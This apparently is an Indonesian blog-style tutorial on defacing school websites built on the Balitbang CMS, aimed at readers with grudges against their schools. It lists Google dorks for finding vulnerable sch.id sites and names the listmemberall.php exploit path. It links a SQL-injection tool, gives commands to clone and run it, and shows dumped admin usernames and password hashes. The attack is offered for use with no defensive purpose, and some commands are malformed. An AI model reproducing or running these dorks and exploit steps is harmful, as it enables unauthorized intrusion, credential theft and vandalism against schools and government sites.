Cara Deface Balitbang Cms
Website Sekolah Gratis
Malem kawan.. malem ini gw mau share cara deface web sekolah menggunakan metode Balitbang.. kalian yg punya dendam, benci atau apalah ke sekolah kalian mngkin bisa bisa pke cara ini:V".. balitbang sendiri ada bnyk ada yg register 3.5.3.. tpi kalaw gw sih pke tools punya nya master gw afrizal:V".. lngsng aja tutorialnya :
1. Termux (download diplaystore)
2. Sc&Shell Backdoor
3. Dork :
>intext:"Setup by Website Sekolah Gratis." Ulangan Site:sch.id>intext:"Setup by cmssekolahku." cbt site:sch.id
>intext:"Setup by Website Sekolah Gratis." rudi site:sch.id
>intext:"Setup by Website Sekolah Gratis." guru bahasa site:sch.id
>intext:"Setup by Website Sekolah Gratis." firman site:sch.id
>intext:"Setup by Website Sekolah Gratis." kenaikan kelas Site:sch.id
(Kembangin ea biar dpet bnyk)
4. Toolsnya :
https://github.com/Afrizall/balitbang-sqli-post-data/blob/master/balitbang.php
5. Exploit ; http://web.nya/path/listmemberall.php
Langkah awal dorking digoogle kek biasanyaa .. Btw gw sih suka deface web pemerintah ketimbang web sekolah:V"..
Pilih salah satu target web sekolah yg mau dideface.. kemudian masukan exploitnya /listmemberall.php kalaw vuln blank putih..
Kalaw sudah nemu target buka termux dan install dulu toolsnya.. caranya?
$git clone https//github.com/Afrizall/balitbang-sqli-post-data/blob/master/balitbang.php
Kemudian
$cd balitbang-sqli-post-dataLast
$php balitbang.php targetkalian
[+] Data 1 [+]
[+] Username : admin
[+] Password : 5bg848383c1c6c7c4b3c0
[+] End Data [+]
[+] Data 2 [+]
[+] Username : gafar
[+] Password : 5bg848383b3bbb9c0b3c5
[+] End Data [+]
Lah done kan.. terakhir tingggal kita hash passwordnya yg data1.. hashnya private ea bang.. wa gw aja 083831973261:V"..